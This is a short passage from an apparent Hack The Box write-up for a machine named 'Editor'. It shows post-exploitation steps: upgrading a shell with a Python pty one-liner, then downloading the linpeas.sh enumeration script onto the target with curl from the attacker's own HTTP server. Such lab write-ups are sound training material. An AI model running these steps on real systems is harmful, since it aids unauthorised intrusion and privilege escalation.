truelyyours/RTFD/htb/Editor/Solution.md

 ![[Pasted image 20250810030501.png]]

 This shell is not that beautiful so I just do `python3 -c 'import pty; pty.spawn("/bin/bash")'` so have a better shell.
 Yaaye!
+## Lateral Privilege Escalation

+I start by installing `linpeas.sh` on the remote host and run it.
+I installed `linpeas.sh` by exposing a `http.server` locally and then simply `curl -LO 10.10.16.16:8000/linpeas.sh`.